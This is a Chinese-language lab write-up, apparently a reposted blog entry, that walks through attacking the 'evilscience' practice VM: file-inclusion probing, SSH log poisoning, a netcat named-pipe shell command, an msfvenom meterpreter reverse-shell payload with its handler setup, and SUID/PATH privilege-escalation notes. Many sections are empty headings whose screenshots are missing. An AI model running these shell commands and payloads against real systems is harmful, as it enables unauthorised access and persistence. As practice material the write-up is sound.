其他分享
首页 > 其他分享> > 靶机记录(十二):evilscience

靶机记录(十二):evilscience

作者:互联网

目录

主机发现

端口扫描

SSH尝试连接

Web渗透

漏洞挖掘

GetShell 

 法一

 法二(MSF)

 提权

 法一(失败了)

 法二(脏牛,也失败了。。)​​​

 法三

 法四

 法五

 flag

清痕迹,留后门


主机发现

端口扫描

 

 SSH尝试连接

 

Web渗透

漏洞挖掘

试试其他的路径 :

/var/log/apache2/access.log
/var/log/apache/access.log     -----WEB 日志文件
/var/www/log/access.log 

                                全失败

尝试读取以下配置文件 :

/etc/apache2/apache2.conf       失败



尝试伪协议读取:
file=php://filter/convert.base64-encode/resource=index.php    失败

PHP伪协议读取试试也是失败的

 由于开了22,80,web日志不行,看一下 SSH 日志

 

GetShell 

 法一

依次执行

mkfifo /tmp/t
编码:mkfifo+/tmp/t

cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;

 

 

 法二(MSF)

生成木马脚本:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set lhost 攻击机IP
set lport 攻击机端口号
run

 

 

 提权

 法一(失败了)

在靶机上下载后 解析的时候都失败了  -> 啥也不是

 法二(脏牛,也失败了。。)

 

 法三

 

这个文件 而这个文件是具有s权限的  
!!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH

 

 

 法四

 

 法五

 

 

 flag

 

清痕迹,留后门

 

标签:tmp,log,攻击机,十二,法二,失败,evilscience,靶机,法一
来源: https://blog.csdn.net/weixin_47306547/article/details/121056248